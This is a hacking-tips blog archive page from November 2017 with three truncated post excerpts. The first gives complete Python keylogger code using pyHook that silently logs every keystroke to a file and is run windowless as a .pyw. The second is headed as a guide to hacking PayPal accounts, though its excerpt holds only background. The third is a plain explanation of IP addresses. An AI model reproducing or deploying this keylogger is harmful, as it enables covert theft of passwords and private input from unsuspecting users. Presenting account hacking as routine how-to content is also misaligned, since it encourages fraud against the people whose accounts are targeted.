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Showing posts from November, 2017

How to Create a Keylogger using Notepad

Keylogger also called keystroke logging, are software programs or hardware devices that record keys struck on the computer keyboard of an individual computer user or network of computers.It almost records every keystroke that user typed and saved as a text file Keylogger Creation Just open the notepad and copy paste the script. import pyHook, pythoncom, sys, logging # feel free to set the file_log to a different file name/location  file_log = 'keyloggeroutput.txt'  def OnKeyboardEvent(event):  logging.basicConfig(filename=file_log, level=logging.DEBUG, format='%(message)s') chr(event.Ascii)  logging.log(10,chr(event.Ascii))  return True  hooks_manager = pyHook.HookManager()  hooks_manager.KeyDown = OnKeyboardEvent  hooks_manager.HookKeyboard()  pythoncom.PumpMessages() 2. Now save it something filename.pyw and execute the keylogger file. When you need to quit logging, open up task manager and execute all...

How to Hack a paypal account

Since its birth in 1998, eBay owned company PayPal has become a hugely popular internet banking company, as the brand-new idea of sending money to anyone in the world through Email has won hearts of millions of internet users worldwide, the number of members of PayPal has been skyrocketing since. PayPal is now by far the most successful internet banking company. However, insecurity on the internet has been a great problem since the beginning of the boom of the dotcom economy; all famous computers companies have been victims of hackers from around the globe due to security flaws in its system. Microsoft is recent victim of the W32.Blaster.Worm virus which has been identified that could allow an attacker to compromise a computer running Microsoft Windows and gain control over it. Microsoft took immediate action after the spread of the virus, however, a considerable amount of computers worldwide have been victimized and the Blaster Worm is still at large. More information on...

What is an IP Address?

The Internet Protocol Address (or IP Address) is a unique address that computing devices such as personal computers, tablets, and smartphones use to identify itself and communicate with other devices in the IP network. Any device connected to the IP network must have a unique IP address within the network. An IP address is analogous to a street address or telephone number in that it is used to uniquely identify an entity. Dotted Decimals The traditional IP Address (known as IPv4 ) uses a 32-bit number to represent an IP address, and it defines both network and host address. A 32-bit number is capable of providing roughly 4 billion unique numbers, and hence IPv4 addresses running out as more devices are connected to the IP network. A new version of the IP protocol ( IPv6 ) has been invented to offer virtually limitless number of unique addresses. An IP address is written in "dotted decimal" notation, which is 4 sets of numbers separated by period each set representing ...